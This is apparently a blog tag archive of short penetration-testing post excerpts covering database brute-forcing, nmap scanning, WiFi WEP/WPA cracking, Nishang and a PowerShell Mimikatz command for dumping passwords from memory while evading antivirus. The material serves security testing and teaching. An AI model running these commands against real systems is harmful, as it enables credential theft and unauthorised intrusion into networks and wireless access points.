Tag: pentest

Brute-force, Cracking

Bruteforce attacks against common database servers

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible …

Penetration Testing, Post-Exploitation

Grabbing Passwords from Memory

* Using Powershell we can bypass AVs easier than using mimikatz.exe which normally is blocked from AVs. * Upload Invoke-Mimikatz.ps1 (part of Nishang Framework) to your target. * Execute remotely: powershell.exe -ExecutionPolicy Bypass -NonInteractive -Command "Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz"powershell.exe -ExecutionPolicy Bypass -NonInteractive -Command "Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz"

Penetration Testing, Post-Exploitation

PowerShell for offensive security

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. Usage Import all the scripts in the current PowerShell session. PS C:\nishang> Import-Module .\nishang.psm1PS C:\nishang> Import-Module .\nishang.psm1 Use the individual scripts with dot …

Web Penetration Testing

Web Application Pentest

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index …

NMAP

Common nmap commands during Pentest

1. Discover live hosts nmap -n -sn -PE -oA live_hosts 192.168.1.0/24nmap -n -sn -PE -oA live_hosts 192.168.1.0/24 2. Discover open TCP ports nmap -sS -vv -p- -oA tcp_ports_65535 192.168.1.15nmap -sS -vv -p- -oA tcp_ports_65535 192.168.1.15 nmap -sS -vv -p- -Pn –reason –open -oA tcp_ports_65535 192.168.1.15nmap -sS -vv -p- -Pn –reason –open -oA tcp_ports_65535 192.168.1.15 nmap …

Penetration Testing, WiFi

WEP WiFi PenTest with Kali Linux

Kali Linux Start your Kali Linux virtual machine. Wireless adapter Plugin your wireless adapter. (see Wireless Adapters suitable for WiFi pen-test). Disconnect Disconnect from all wireless networks. Enable monitor mode on wireless interface List wireless interfaces supporting monitor mode airmon-ngairmon-ng Enable monitor mode airmon-ng start wlan0airmon-ng start wlan0 Scan for WiFi networks airodump-ng wlan0monairodump-ng wlan0mon …

Penetration Testing, WiFi

WPA/WPA2 WiFi PenTest with Kali Linux

Kali Linux Start your Kali Linux virtual machine. Wireless adapter Plugin your wireless adapter. (see Wireless Adapters suitable for WiFi pen-test). Disconnect Disconnect from all wireless networks. Enable monitor mode on wireless interface List wireless interfaces supporting monitor mode airmon-ngairmon-ng Enable monitor mode airmon-ng start wlan0airmon-ng start wlan0 Scan for WiFi networks airodump-ng wlan0monairodump-ng wlan0mon …